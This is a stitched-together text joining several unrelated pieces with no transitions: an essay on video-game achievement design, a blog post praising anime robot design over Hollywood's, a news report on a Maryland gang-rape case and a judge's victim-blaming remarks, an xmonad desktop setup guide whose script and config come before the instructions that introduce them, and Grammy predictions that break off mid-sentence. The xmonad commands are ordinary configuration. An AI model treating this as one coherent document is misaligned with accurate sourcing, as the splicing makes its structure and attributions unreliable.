One in particular was giving me a bit of trouble — I had to kill 5 enemy players carrying the single neutral flag in Eye of the Storm , a battleground scenario similar to capture the flag .
This task had to be accomplished in a single game , and , after a few games of enemy players not even touching the flag , I got frustrated .
So I got an idea .
I recruited a few of my friends , we ran in together , and I grabbed the flag myself .
Rather than capturing it for my team , I sought out lone enemy players , dropped the flag in front of them , and then backed away , hoping they 'd take the bait .
When they did , my friends and I would pounce , killing the flag carrier ( thus satisfying the achievement requirement ) , grabbing the flag back , and then repeating the process .
After about 10 minutes , my team caught on to the fact that my little posse was n't exactly working toward a team victory .
" WTF R U DOING WITH THE FLaGG ?!?! " an ally demanded .
" Achievement , duh , " I replied .
The conversation grew more explicit from there .
But I 'll admit it — I was being a jerk .
I had to .
If the achievement was n't demanding it , it was at the very least encouraging it .
And I had to have that achievement .
I was reminded of Halo 2's multiplayer achievements .
Some were so completely ridiculous to achieve that the only rational way to attempt them would be to get everyone to cooperate .
I heard rumors about people being banned for this , and achievement addicts fleeing to the Italian rooms to continue their collusion .
I do n't know if that part is true , but what I do know is that in half the games I joined , some guy would propose the idea of intended foes working together for the purpose of earning achievements .
What game designers in general often seem to ignore is that when players are presented a goal , their first inclination is to devise the most efficient ( not necessarily the most fun ) means of reaching that goal .
This is true of any game , with or without achievements , single - player or multiplayer .
Show the player the end point , and that player will take the quickest and easiest route , regardless of whatever path the game intended for him to take .
When designing multiplayer achievements , do not trust that they are tasks that the player will just naturally bump into .
Put yourself in the player 's shoes .
Pretend that earning this achievement is the most important thing in your life , and no ethically questionable actions are beneath you .
How will you earn it ?
What 's the most efficient method ?
Once you know this , ask the most important question of all : " Will this method negatively influence the gameplay experience of others ? "
The other problem with multiplayer achievements occurs when extremely specific behavior is required of your opponent .
The player does not control his opponent 's behavior , and when a crucial element of earning an achievement is beyond the player 's control , it can get extremely frustrating .
" Kill 10 enemies in X area " is okay because there will almost always be enemies in a specific area of a map , and these achievements can possibly have a positive effect on the gameplay experience if it's a naturally good spot for people to clump together and fight it out .
In general , multiplayer achievements are dangerous .
Unless you 're absolutely sure they 're impossible to exploit and wo n't negatively influence how people play a game , I would highly recommend keeping them simple and in line with the general style by which a game is played .
4 . Always evaluate the weight and fun of an achievement by the most efficient method by which it is earned .
Again , players do what 's efficient , not what 's fun .
It ’s up to the designer , not the player , to ensure that efficient actions overlap with fun ones .
If there 's an achievement for completing levels 1 through 3 without dying more than 10 times , then the player is likely going to reset the whole game every time he dies on the first level ( assuming no checkpoints ) , even if this process interrupts game flow and makes the play session less fun .
If there 's an achievement for killing X enemies in under Y minutes , the player is n't just going to play through the game normally and hope he gets a good streak — he 's going to round up the biggest group he can find , avoid touching them , then unleash his fury .
If there 's an achievement for killing 10 enemies without being hit , the player is just going to go to the easiest room on the easiest difficulty setting , find the easiest enemies and get to it .
And sometimes this is okay .
Other times it 's not .
But the job of an achievement is to help the player have fun , to give the player an accomplishment , and to allow others to recognize what the player has achieved .
Regardless of how the player earns an achievement , the weight of that achievement and the perceived value of it from other players is always going to be determined by the easiest method by which it can be earned .
If there 's a room full of enemies on level 10 , and it's a super awesome expression of skill to kill 10 of those enemies without being touched on the hardest difficulty setting , then make the achievement " kill 10 enemies on level 10 on the ' hard ' difficulty setting without being hit . "
If the achievement is just to kill 10 enemies without being hit , even if the player achieves it by a means that 's more impressive than playing the first level on the easiest difficulty setting , there 's no way for other players to know ; thus , the achievement is n't doing its job of helping that player show off how awesome he is .
Once the easiest path to accomplishing an achievement has been planned out , again ask if it 's actually fun , or just mildly tedious .
Players will pick easy / tedious routes over more difficult , fun ones .
Make the achievement requirements specific to cut off potential exploits if you need to — do n't just rely on players naturally having the experience you want them to .
Force them .
5 . " Holy crap , did you see that ? ! " achievements should either be easy or fully within the player 's control to accomplish .
Sometimes something crazy will happen in a game , and it 'll be so over - the - top and ridiculous that anyone experiencing the moment will start laughing and pointing at the screen .
It 'll be fun .
They 'll want to share the moment .
Achievement designers will want to enhance the experience by attaching an achievement to it .
The problem here is that once an achievement has been attached to it , it 's no longer a fun little event that occurs naturally .
It 's now a very specific event that the player must painstakingly attempt to create .
Doing a crazy stunt in a Tony Hawk game is fine because the player has full control over the situation , and it can be difficult for the right reasons ( mastery of the game 's core mechanics ) .
But when an event is highly reliant on enemies performing a specific way , or it's so crazy that it 's basically left to chance ( such as having perfect accuracy on a moving target with an inaccurate weapon at an incredibly long range ) , then it 's just not fun anymore .
The player is not going to play the game naturally and hope that it happens .
He 's going to create the ideal scenario for it to occur , then he 's going to play through this scenario again and again and again , hoping that this crazy moment will happen and the achievement will be awarded .
That 's not fun , and it's not the spirit in which the achievement was designed .
Perhaps the worst - designed achievement in WoW has to be " We Had It All Along * cough * " , an achievement awarded for having a PvP victory by exactly 10 points out of 1600 .
The achievement is agonizingly part of the aforementioned PvP meta- achievement ( achievements naturally warrant far more scrutiny if they ’re part of a larger meta-achievement ) .
The idea behind this achievement had to be pretty simple — winning by exactly 10 points is a crazy moment in the game , and the designers wanted to reinforce this moment with an achievement .
But once this achievement is added , it 's no longer a crazy moment with an achievement attached ; it 's a moment of " thank God that finally happened by some miracle so I 'll never have to worry about it again . "
The confounding problem here is that players who are adamant about earning the achievement are encouraged by the game 's mechanics to simply stop contributing to their team 's success if it appears as though their team might win by 30 points rather than 10 .
By contrast , the WoW achievement " Mine Sweeper " is an example of this design done correctly — it 's awarded for bouncing across 10 explosive mines without touching the ground .
Sure , the in - game objective is to actually avoid the mines , but hitting 10 mines is not too unlikely by pure chance .
For those who do n't notice the achievement , it does successfully reinforce a fun little moment .
And for those seeking out the achievement , it does n't take long to earn .
6 . Acknowledge the highest difficulty on which something has been accomplished .
I 've never understood achievements that require completing a task on an easier difficulty setting .
If the player completes the game on " hard , " he should not be required to go through and complete it again on " easy " just to earn the achievement .
Have both achievements awarded for completing the game on a harder difficulty setting .
7. Achievements will thrust their subject matter into the spotlight ; make sure it 's worthy .
This can be good or bad .
In most cases on Kongregate , adding achievements to games will cause the user rating to drop .
There are many theories about why this is — my best guess is that there 's a difference in psychology between people who play a game just to have fun ( how weird ! ) and people who play a game to earn achievements .
For the latter category , the whole game can be viewed as merely an obstacle .
One thing is for certain , though .
Nothing kills a game 's rating on Kongregate more than poorly designed achievements .
I can only theorize about an analogous scenario with games on Xbox 360 .
Game reviewers probably wo n't mark a game down for having bad achievements , but I could easily imagine players changing their opinion about a game based on its achievement design .
Over the past couple of years at Kongregate , I 've learned to dissect games : picking apart the fun elements and setting aside the stuff that 's maybe not so great .
Some of the worst achievements on Kongregate were created out of the mentality that if something is there , and it 's significant , there should be an achievement for doing it .
To hell with whether or not it 's actually fun !
The power of achievements in driving user discovery did n't fully hit me until a game was uploaded called Dolphin Olympics 2 .
It 's a fairly simple game where you control a dolphin jumping out of the water and doing a few simple tricks .
It started out with somewhat mediocre rating on Kongregate — just barely high enough to be recognized with achievements at all .
What many players failed to realize , however , is that the game is actually pretty insane .
Once you get past a certain elevation , you break free of Earth 's atmosphere , spinning around planets , sliding along strips of stars , and eventually flying past the Restaurant at the End of the Universe .
Once achievements were added to accomplish these things , the user rating skyrocketed .
A great power behind achievements is that they can force people to examine something they might have otherwise overlooked .
If there 's an awesome optional side quest in your game that 's easy to miss , it might take a lot of work to change the game 's flow to direct players toward that optional content , but it 's far simpler to just add an achievement for doing it — the players will figure it out from there ; do n't worry !
Conversely , if there 's a part of the game that did n't work out as well as intended , and maybe it does n't quite shine as brightly as the rest of the game ( the vehicle driving section of a first - person shooter , so to speak ) , then there 's really no inherent value to forcing people to play it any longer than they want to just to earn an achievement .
And just because the player can do something crazy and miserable in a game does n't mean there has to be an achievement for it .
Think of the people who would n't otherwise do it , not the one (s ) who did .
8 . Pretend that the player dies if he reaches a point where an achievement is no longer earnable , and then evaluate how frustrating that experience would be and whether it makes any sense .
Since death and reaching a point where an achievement is not earnable are essentially the same thing for a player who ’s only playing something to earn an achievement , this can often serve as a useful check into how the player will react .
It ’s really easy to imagine for " do n't get hit " achievements .
It 's basically saying that the player has 1 point of health .
And sometimes that 's okay .
Plenty of games cause the player to die and restart a specific section if he takes any damage .
So those achievements will pass the test , unless the game is designed around the expectation that the player will take steady damage over time .
It starts to get a little trickier with timed achievements .
Many older games will punish the player with death if he takes too long , but Shenmue is perhaps the only game to give the player a game over screen after taking too long and playing for an extremely significant amount of time ( some might argue that the mechanic works in a hyper - realistic game like Shenmue , but it ’s still incredibly rare ) .
Achievements that require completing a game in less than 8 hours are unlikely to pass this test , as it would be unbelievably frustrating to get a permanent game over screen halfway through a game after playing it for 8 hours .
Instead , break it up into chunks , and require that individual levels be completed under a set time , then award an achievement at the end for doing this with each level .
Same display of skill , far less frustration .
If there 's a relatively bizarre condition for an achievement , such as not killing a specific enemy , not using a specific weapon , etc. , then again , recognize that the player will likely restart if he 's going for the achievement and these conditions are violated , so pretend that killing the wrong enemy or using the wrong weapon grant instant death .
No achievement is more bizarre ( and , in my opinion , poorly designed ) than achievements for dying a certain number of times .
This is not an achievement — this is just a public record of the player 's failure ( except it 's not even really that , since the player will likely go out of his way to intentionally die repeatedly on an early level just to earn it ) .
This type of achievement reveals itself to be even more ludicrous when applied to this section 's check — the player dies and has to restart if he does n't die and have to restart ?
9 . Do not allow the player 's save file to easily and accidentally reach a point where an achievement is no longer earnable .
It is unbelievably frustrating to pass up a narrow achievement window , save your game , and then be unable to earn it without starting all over .
It forces the player into a mentality of nervously using online guides to see when achievements are coming up , making sure they 're all charted out , and then carefully earning each one before progressing naturally with the game .
It completely sucks away the carefree enjoyment of just playing through a game 's story , and there 's really no reason for it .
Let the player go back and earn missed achievements , if possible .
If not possible , evaluate whether to have that achievement at all , or at least how it can be made difficult to miss .
For the vast majority of games on Kongregate , it is impossible to miss a window for an achievement and be screwed out of earning it with a specific save file .
( The few exceptions are found in games that are relatively short and heavily time - based . )
Also , fun fact :
Every single achievement in WoW is earnable by a single player character of any race or class , with no achievement ever becoming unearnable or requiring the creation of a second character .
10 .
Insultingly easy or excessive quantities of extremely difficult achievements can negatively influence players ' perception of the system as a whole .
Prince of Persia crossed the threshold of awarding an achievement for simply watching the intro movie , but this territory was flirted with before , and the practice continues today .
Ridiculously trivial achievements are not truly " achievements . "
They 're just records of something that happened — and not even interesting events , at that .
They 're the Twitter feed of achievements .
Just as individual achievements only have as much weight / meaning as the easiest means by which they are accomplished , the numeric quantity of achievements earned within an entire system only has as much weight as the easiest means by which a player can reach that quantity ( or point value , if harder achievements are worth more points ) .
Thus , ridiculously easy achievements inflate the system as a whole , devaluing others in the system .
I saw this as a potential problem when I started designing achievements for Kongregate , and I had a simple philosophy to fix it : Achievements are achievements , dammit — they 're serious accomplishments , not to be taken lightly !
I wanted each and every one to carry some serious weight behind it .
A lot of games do this , too .
There will be an easy achievement here and there , but 90 % of them will require some serious dedication .
The problem with this philosophy is that players wo n't feel like the system is really for them ; rather , it 's for some nebulous other person — someone who 's better than they are , with more time to commit to that specific game .
To attach players to a system and make them feel invested in it , the achievement designer must strike a careful balance between giving the player a good chunk of achievements that are realistic to achieve , and making sure that these achievements still have enough difficulty to carry some psychological weight and value once they are earned .
I would like to think that the achievement system on Kongregate is truly for everyone .
There are some easy achievements , but very few ( if any ) insultingly trivial ones .
Most players can fill their profile with achievements , but only the more dedicated players can really rack up significant points in the system with the harder ones , which award more points .
It draws people in and always gives them a little extra something to push for , which is what achievements should be all about , anywhere .
11 . Do n't use achievements to force the player down a specific path in an open - ended game .
BioShock , why did you do this ?
An achievement for completing the good ending , but not the evil one ?
Not only does this violate the aforementioned guideline of not allowing the player to screw himself out of being able to earn an achievement later , but it 's actually detrimental to the game as a whole because it completely removes the sense of choice from the player 's end .
Choosing between good and evil might have been an interesting decision to weigh if the achievement did n't essentially make it for the player .
Likewise , if there 's an achievement for upgrading a weapon down a specific path , or getting a certain set of abilities , etc. , all this is doing is removing a sense of choice from the player .
You might as well just have a little " THIS IS THE ACHIEVEMENT OPTION " arrow pointing to the player 's " correct " decisions whenever a specific path is required to earn an achievement .
So what should BioShock have done ?
Had a second achievement for completing the evil ending ?
I would argue " no , " simply because the game itself differed far too little between good and evil — there was n't enough alternate content to justify playing through the game again for most players .
When evaluating whether to make extra achievements for going down multiple paths , ask whether the alternate - path content is varied enough to justify playing through it even without the achievement .
For example , it makes sense to have achievements for playing through all the starting areas in Dragon Age Origins because they 're all vastly different and worth experiencing on their own , but it would n't make any sense at all to require the player to complete the entire game from each and every starting point , since the game 's entry points converge relatively early on .
12 . Do n't make timed achievements for puzzle games in which the solution can be easily memorized .
These might as well just be called " memorize what you just did and do it again " achievements .
They 're not fun , and there 's no point to them .
On Kongregate , I 've taken a stand against any achievement design that 's realistically impossible the first time a game is played , then ridiculously easy the second time .
Just award the player for completing the puzzle and move on .
( Randomized puzzles are exceptions here , since those time requirements can be balanced around the assumption that the player will not have a solution memorized . )
Again , ask why the achievement is hard .
If it 's balanced around an expected time the first run through , then it might be hard for the right reasons during that first play .
The problem , though , is that the weight / value of the achievement is still pretty low , since it can be achieved easily on the second play through .
If the puzzle time is balanced around the expected time for the second run through , then it 's either going to be ridiculously easy ( and needlessly tedious ) , or it 's going to be difficult for the wrong reasons — expecting the player to quickly execute something that has already been solved , when the game 's difficulty is intended to be derived from reaching the solution , not the speed of the execution .
13 . " Secret " achievements ( in which the earning criteria are not displayed ) are dumb .
The description for them might as well just be , " Go look this up online . "
There 's absolutely no point to them , other than just giving the player an errand .
The only people who are surprised to earn secret achievements are the people who would n't have bothered to check what the achievement is in the first place .
14 . " The player does n't have to earn the achievement " is not an excuse .
If I 'm a chef at a restaurant and I serve your sirloin steak with a side of dog food and gravy , sure , you can choose not to eat it , but it 's still going to affect your opinion of me as a chef and of the restaurant as a dining establishment .
Most people will not earn most of the achievements that are presented to them .
But how they regard the achievements that they do n't earn , and what rationale they give for not earning those achievements , is important to how they view the system as a whole .
If an achievement is ridiculously difficult ( and difficult for the right reasons ) , then the player might give up on earning that achievement , but still have respect for the task and for the people who do manage to earn it .
For example , if there 's an achievement in Guitar Hero for getting 5 stars on " Through the Fire and Flames , " the player will acknowledge that he's not going to earn that achievement because the song is ridiculously hard , and he 's just not good enough at the game .
For the people who do earn the achievement , the player has great respect .
It ’s good design .
If there 's an achievement for playing through the game using an Xbox controller , that 's just not a fun experience that most people want to have , even if it ’s not overly difficult .
Most people are not even going to attempt it — and they 'll cite the reason as being because the game is not fun to play with an Xbox controller , not because it is an amazingly awesome display of skill .
The player will react to those who have the achievement more with " I can't believe you actually played Guitar Hero with an Xbox controller , " rather than " Holy crap , that is amazing . "
When players come across poorly designed achievements , the bottom line is that it lessens their psychological investment into the system as a whole .
It is impossible for this to happen without also lessening the sense of accomplishment the player feels when he does earn an achievement in this system .
To quote the great Jurassic Park philosopher Ian Malcolm , " Your scientists were so preoccupied with whether or not they could , they did n't stop to think if they should . "
This was shortly before the entire park and multibillion - dollar facilities were torn apart by dinosaurs .
Think about it .
Yes I know James Cameron will make a billion dollars with Avatar .
But you know what Cameron will never know how to do ?
Create a damn high quality giant robot that kids will want to buy thirty years from now !
Shown above is the reason why : The Avatar AMP Suit ( shown above ) looks like a left over prop from the film Aliens :
Yes that design was really cool in 1986 — that ’s when Cameron was n’t “ king of the world ” and he hired the likes of talented folks like Syd Mead to help out .
Just to give you a comparison here ’s a state - of - the - art anime robot from four years earlier in 1982 :
What you ’re looking at above is the Gerwalk which transform from a fighter space craft to a walking robot from the anime series Macross , which Americans know as Robotech .
Now let ’s jump ahead to year 2009 to the very hip anime series Basquash !
which features robots that are so low - cost to the characters that they are used to play an over sized game of basketball while the characters exchange snarky remarks ( because to them this is just hanging out in the hood ) :
But now take a closer look at the actual design :
That ’s right , not only do these robots play basketball to amuse their owners — but they double as kitbashed low rider cars that you ’d find in the hood in LA :
When you look at the creativity in a show like Basquash !
suddenly James Cameron seems so vanilla .
It comes down to a sheer lack of creativity in Hollywood , for example Japan has escaped the notion that a robot even has to look like a robot :
Not only is Mahoro Andou from Mahoromatic a robot ( “ More Human Than Human ” as we say at the Tyrell Corporation ) — but she ’s was designed for the manga Mahoromatic over ten years ago in 1998 !
In the mean time us poor Americans are still stuck with this :
No wonder poor Astro looks so depressed !
And just so you do n’t accuse me of being a sexist , the quality of American male robot butlers are even more embarrassing to look at :
Now I know exactly what you ’re thinking right now : “ Oh sure the Japanese can design a pretty robot , but what about the raw fire power ? ”
Well check this scene from the Big O anime series — now mind you that this was done on a television budget which is a fraction of a Hollywood film :
So it ’s not the budget , it ’s a matter of good old fashioned storytelling .
Hollywood sees the robot as comedy relief or a prop where the anime studios are n’t afraid to give a starring role to a hunk of metal .
True you might see an small exception from time to time like the live action Transformers films , but sadly even that is based on anime .
So at this point you may be asking just why are the Japanese are so damn good at making giant robots ?
Well here ’s the dirty little secret that makes all the difference :
What you ’re looking at is the Bandai booth from the New York City Toy Fair from earlier this year .
Unlike Hollywood where toy companies and film companies are two different beasts — this is n’t the case in Japan .
Bandai started life as a toy company in 1900 , and today own the field in Japan — but just as important is the fact that they also are a film and television powerhouse .
So imagine if Disney and Hasbro were the same company : You ’d have Bandai .
But it even goes further than that since the videogame maker Namco is also a part of Bandai .
So now take Disney , Hasbro and add Electronic Arts in for fun .
A secret to the multi-medium success of Bandai is that they do n’t hamstring the creative aspects of the shows and films they create :
Although the idea of making those shows toyable ( and yes that ’s an industry term ) is part of their core corporate DNA .
So for example when Bandai backed the anime series Cowboy Bebop they told director Shinichirō Watanabe “ you can do anything you want , so long as the show has some spaceships . ”
The result is some amazing entertainment and some cool toys for the fanboys to buy for years to come .
Below : Tetsujin 28 - go ( known as Gigantor in United States ) started life as a manga in 1956 — the robot is so beloved that a full scale version of it was built .
AMERICA : The rapists were only put on probation , with the judge saying the crime was ‘ waiting to happen ’ , writes LARA MARLOWE
A YEAR after the crime , Séamus T’s voice still quivers when he recalls how he found his daughter Erin , then 15 , lying on the roadside on the night of January 3rd , 2009 .
“ Daddy , Daddy , get them off me , ” she kept moaning .
The girl was semi-conscious , and was soaking wet because her assailants had put her under a shower to wash vomit and menstrual blood off her after they gang - raped her .
Séamus T , an Irishman who left Dublin 25 years ago , continues his job as an executive in a mechanical contracting firm , but he has spent much of the past year seeking justice for Erin .
The ordeal started as a cosy reunion of three high - school girls after the holidays .
Séamus T dropped his daughter off at an apartment in Gaithersburg , Maryland , at 8.30 pm , and was to have picked her up three hours later .
Boys showed up at the party .
“ They gave her ‘ jungle juice ’ , 100 per cent grain alcohol , ” Séamus T explains .
Doctors at Shady Grove hospital later found Erin had almost three times the legal limit in her blood .
Three teenagers , then aged 16 and 17 , planned the rape .
One waited in the bathroom while the other two dragged Erin in .
When the district attorney read through the medical report at a seven - hour hearing on September 30th , Erin ’s family heard how the attackers tore flesh on three of the girl ’s body orifices .
She banged her head when she fell against the bath tub , and was covered in bruises .
Had the three young men not boasted of their crime , they would not have been identified , because Erin cannot remember the rape .
They were arrested in late February , spent a couple of months in jail , and were freed pending the hearing .
Erin was taunted by other students , who accused her of “ snitching ” ’ on the rapists .
The girl was so traumatised that she slept with her mother or older sister until she went to live with relatives in Nevada , at her request .
The case shifted from adult to juvenile court , and Séamus T learned in September that two of the three rapists were back at Magruder High School .
He filed a complaint with the board of education , and succeeded in having them transferred .
“ My daughter was the only white kid at the party , ” Séamus T says .
“ I do n’t think the attack was racially motivated , but there were racial and class undertones in the courtroom .
On one side you had the three rapists , an aunt and two single mothers , all African - Americans .
On the other side , everyone was white and middle class . ”
Montgomery county circuit court judge Steven Salant so enraged Séamus T that he filed a complaint with the Maryland Commission on Judicial Disabilities , the body that disciplines judges , on the grounds his daughter “ was not treated with dignity and respect ” as required by the state constitution .
Salant did not respond to The Irish Times ’s request for comment , which was made through the court ’s spokesman .
Séamus T says Salant blamed the victim and made excuses for the rapists , who he sentenced to probation only .
As recounted by the Gaithersburg Gazette newspaper , the judge described the gang - rape as “ horrific ” , but focused on Erin ’s behaviour on the night of the party .
The victim was drunk and “ engaged in risky and provocative behaviour ” such as sitting on people ’s laps and talking about “ hooking up ” , Salant said in court .
“ This was a disaster waiting to happen . . .
There was a dynamic at work here .
“ There were things going on here .
It does n’t make the respondents any less worthy of blame , but what it does mean is I have to determine whether what we have here is sexual predators or respondents who . . . did not get that when a girl is intoxicated and presents herself in that manner you do not take advantage . ”
“ We were devastated as a family .
We were destroyed , ” says Séamus T .
“ We went to court expecting some compassion .
The system is upside down and backwards .
The judge was worried about the rapists staying in school , getting evaluated , getting counselling and transportation .
Everything is lavished on them .
Nobody knocked on my door and said , ‘ I ’ll show you through the system ’ . ”
Séamus T’s appeals to first lady Michelle Obama , Maryland governor Martin O’Malley and state attorney John McCarthy have gone unanswered .
He was treated with kindness by the Irish Embassy , which promised to intervene if he felt he was not being treated as a US citizen would be .
The state legislature has provided the most hope of redress .
Kathleen Dumais , a Maryland state delegate , and Nancy King , a Maryland state senator , have taken up the case .
Dumais is drafting legislation that would ban juvenile sex offenders from attending normal public schools and place their names on a register .
If passed , it may be called Erin ’s law .
apt - get install xmonad libghc6 - xmonad - contrib - dev libghc6 - xmonad - dev dwm - tools feh
#!/bin/bash
xrdb - merge .
Xresources
gnome - settings - daemon
/usr/lib/gnome-session/helpers/gnome-settings-daemon-helper
gnome - panel &
gnome - screensaver
syndaemon -d -t
# feh -- bg - scale /usr/share/backgrounds/warty-final-ubuntu.png
&
# xsetroot - solid " #978989 " # Lighter gray .
xsetroot - solid " #636161 " # Darker gray .
# This must be started before seahorse - daemon .
eval $ ( gnome- keyring - daemon )
export GNOME -KEYRING -SOCKET
export GNOME-KEYRING-PID
# This is all the stuff I found in " Startup Applications " .
/usr/lib/gnome-session/helpers/at-spi-registryd-wrapper &
bluetooth - applet &
sh -c ' test -e / var / cache / jockey / check || exec jockey - gtk -- check 60 ' &
# sh -c " sleep 30 ; exec /usr / lib / evolution/2.26/evolution-alarm-notify "
# gnome - keyring - daemon -- start
# /usr/bin/canberra-gtk-play --id=" desktop-login " -- description = " GNOME Login "
# /usr/lib/gnome-session/helpers/gnome-session-splash
sh -c " sleep 60 && python /usr / share / gnome - panel/add-indicator-applet.py " &
nm-applet -- sm-disable &
sh -c " sleep 1 && gnome - power - manager " &
sh -c " sleep 31 && system - config - printer - applet > / dev/null 2 > / dev/null " &
# /usr/lib/vino/vino-server &
seahorse - daemon
update - notifier -- startup - delay=60 &
xdg-user - dirs - gtk- update
# gnome - at - visual -s
exec xmonad
chmod +x /usr/local/bin/xmonad.start
import XMonad hiding ( Tall )
import XMonad.Hooks .ManageDocks
import XMonad .
Hooks .SetWMName
import XMonad .
Layout .
Circle
import XMonad .
Layout .
Magnifier
import XMonad.Layout.HintedTile
myLayout = avoidStruts $ hintedTile Tall ||| hintedTile Wide ||| Circle
||| magnifier Circle | || Full
-- hintedTile listens to application hints , so as not to break gVim .
where
hintedTile = HintedTile nmaster delta ratio TopLeft
nmaster = 1
delta = 3/100
ratio = 1/2
myManageHook = composeAll
[ className =? " Gimp " --> doFloat ]
main = do
xmonad $ defaultConfig
{ manageHook = manageDocks <+> myManageHook <+> manageHook defaultConfig
-- I used to use : avoidStruts $ layoutHook defaultConfig
, layoutHook = myLayout
-- This hack is necessary to make Java GUIs like NetBeans work .
See the FAQ .
, logHook = setWMName " LG3D "
}
ghci ~/.xmonad/xmonad.hs
Since I already blogged about why I think xmonad is interesting , I thought I would take the time to blog about my xmonad setup .
I 'd like to thank arjuna del toso for his instructions , because that 's how I got started .
Start by installing all the software :
Now , edit /usr / share / xsessions / xmonad.desktop so that it executes " xmonad.start " instead of " xmonad " .
Then create /usr / local / bin/xmonad.start :
You might wonder how I came up with all of that .
I started with the xmonad documentation .
Then , I opened up " Startup Applications " when logged into my GNOME desktop in order to figure out what I wanted to recreate .
Some of the things I decided I did n't need .
Some of the things had to be tweaked to run outside the context of a normal Ubuntu environment .
Make the script executable :
Now , create ~/.xmonad/xmonad.hs :
To test that you got the syntax right :
Note that I decided not to use xmobar , which is a text - based status bar .
It 's just not my thing , although you might want to read arjuna del toso 's instructions and give it a shot .
Last of all , there was one more incredibly esoteric hack that was necessary .
If you using xmonad + NetBeans + jVi , then using " : w " to save your file will cause NetBeans to lock up .
Weird , I know .
The workaround is to edit your jVi preferences to tell jVi not to handle Control -s , but rather to pass it to the IDE .
That way , you can use Control -s to save your file instead of using " : w " .
Make sure to read the guided tour and check the xmonad FAQ if you have any issues .
Update : Read our 2011 Grammy predictions .
***
Nominations for the 52nd annual Grammy Awards will be announced Dec. 2 .
After two straight years of handing the Album Of The Year award to questionably hip acts like Herbie Hancock and Robert Plant & Alison Krauss , it will be interesting to see if the voters revert back to acknowledging more relevant acts .
With the music industry churning out fewer big sellers , the fields for Album Of The Year and Best New Artist are as weak as ever , but it ’s business as usual for the other two general categories — Record Of The Year and Song Of The Year .
Even still , we think it ’s worth a little prognosticating .
Herewith , our predictions for this year ’s Grammy awards .
Album Of The Year
Without a doubt , Taylor Swift ’s Fearless is a lock for Album Of The Year .
She has the commercial success and critical accolades that are usually commonplace in this category .
Very few artists this year have the kind of favorable consensus behind them like Taylor Swift does , and it does n’t hurt that country music has been well represented in this category the last three years ( Alison Krauss , Vince Gill and The Dixie Chicks ) .
Swift ’s only other competition in the country genre would come from either Sugarland ’s Love On The Inside or George Strait ’s Twang , and that would be only because some do n’t take her seriously enough and would n’t want to reward someone so young .
A snub is unlikely , because she will also get crossover votes and the album has already been certified platinum four times .
Another artist with a monster year comparable to Taylor Swift ’s is Lady Gaga .
It ’s very rare for dance artists to get nominations in the general categories , but Lady Gaga was inescapable for most of 2009 , and in such a weak field , her ubiquity will be hard to overlook , despite the singles getting more attention than the album itself .
The Black Eyed Peas ’ The E.N.D. is the only threat to take over the pop genre slot from Lady Gaga , but the album has received a mixed responsed critically at best , in spite of having two of the year ’s biggest hits .
Due to the year round attention she ’s gotten in the press and boasting four big singles from one album , Lady Gaga ’s The Fame is likely to get an AOTY nod .
After that , things get a little tricky .
There is usually one or two representatives from hip - hop and R&B each year , and this year boasts some very stiff competition .
If The - Dream ’s Love Vs. Money had at least one more huge crossover single besides “ Rockin ’ That Thang , ” it would be a serious contender ; it ’s gotten some of the best reviews for any R&B album this year .
The - Dream is also one of the most commerically successful songwriters in modern pop music right now , so the name recognition is there among voters , but the album does n’t have the sales to make an impact here .
Keri Hilson could see a Best New Artist nod and maybe a few other nominations in the general categories , but much like The - Dream , who has gotten recognition for writing hit songs for other artists , the sales for In A Perfect World … just do n’t measure up .
Eminem ’s Relapse sold well , but it ’s not as good as his old stuff , and he no longer has a hold on the pop culture conscience like he used to .
Beyonce ’s I Am…Sasha Fierce is another strong contender due to its robust sales and attention - grabbing concept , but she ’s never been known as an album artist .
I Am…Sasha Fierce is unlikely to change the majority of voters ’ minds , who have yet to giver her a nod in this category despite having released two popular albums .
When talking about Album Of The Year , Kanye West ’s name has to be brought up .
All three of his albums have been nominated for AOTY before , but 808s & Heartbreak brings up a question mark .
It was n’t quite the commercial force that his previous three were .
In addition to that , the album is the most divisive of his career , despite being generally acclaimed overall .
The Grammys love a comeback story , and there are fewer bigger ones than Whitney Houston ’s return to music .
I Look To
You has very a high awareness factor , but so much discussion has been on the comeback story and not the album itself , which for the most part has received average reviews .
But then again , it is Whitney Houston , an iconic , multiple Grammy winner .
Just the fact that she was able to put together an album that was n’t horrible may be all that ’s needed to convince the voters .
The comeback story that everyone should be looking out for is Maxwell .
After an eight - year hiatus , he returned with BLACKsummers ’night , which debuted at No. 1 on the Billboard Top 200 and is one of the most well - reviewed albums of the year .
He ’s also been nominated multiple times , but he ’s never won and his albums have earned him nothing but respect ever since his debut .
What we ’re left with is three very strong contenders vying for the hip - hop / R&B slot : Kanye , Whitney and Maxwell .
Some may note that both Lil’ Wayne and Ne - Yo received AOTY nominations last year , thus debunking the idea that each genre gets a sole represenative .
Something very similiar might happen , as well , with either one or two of the three artists mentioned getting a nod .
Kanye West ’s 808s & Heartbreak seems very likely if voters are willing to reward him for experimenting with his sound .
For better or worse , Kanye has been in the spotlight all year round and cannot be too far from voters ’ minds , and the idea of a Kanye / Taylor Swift showdown may be too appealing for some to pass up .
Ne - Yo ’s nod for Year of the Gentleman last year over the heavily favored Alicia Keys shows that the R&B voting contigent is not too hung up on who sold the most , but willing to reward what they feel is the better work .
This should bode well for BLACKsummers ’night , which should play spoiler for Whitney Houston ’s comeback party .
With a lack of breakout albums that have both outstanding commercial success and near universal critical acclaim , the field for Album of the Year is once again weak this year .
The music industry just has n’t been churning out the number of success stories like it used to during the 1990s , which leaves the opportunity for a few surprises , much in the same way that Vince Gill and Herbie Hancock crashed the party a few years ago .
These types of surprises are so hard to call that it ’s difficult to take a chance on them when predicting the nominees .
This would be the perfect year for something like the Slumdog Millionaire soundtrack to make a splash .
While the momentum for it has passed , it ’s still a culturally relevant reference and it does n’t hurt that it includes M.I.A. , who was nominated for Record Of The Year at the previous ceremony .
Seal is a previous AOTY nominee , and Soul , a slicky produced covers album , is the type of palatable music that the Grammys find favorable .
Dave Matthews Band ’s Big Whiskey &
The Groogrux King is an obvious sentimental favorite due to the loss of a band member and could see more AOTY votes than they ever have in their career .
Even something like Diana Krall ’s Quiet Nights could quietly sneak in , just like she did in 1999 .
Older veterans are just as likely to land nods in this category as well , and it ’s almost considered a given that one will find their way in each year .
While the list of veterans who released albums this year features some big names , they have not gotten as much press as their previous work .
Bob Dylan ’s Together Through Life made headlines for reaching No. 1 , but the response has been nowhere near the level of enthusisasm for Time Out Of Mind and Love and Theft , both of which got nods in AOTY .
AC / DC ’s Black
Ice has the gaudiest sales numbers and it would make an interesting story for the academy to finally reward such a legendary act , but the album itself has seemed to have lost momentum , and if we ’re going to be perfectly honest , it ’s not much different than their previous work .
Bruce Springsteen ’s Working
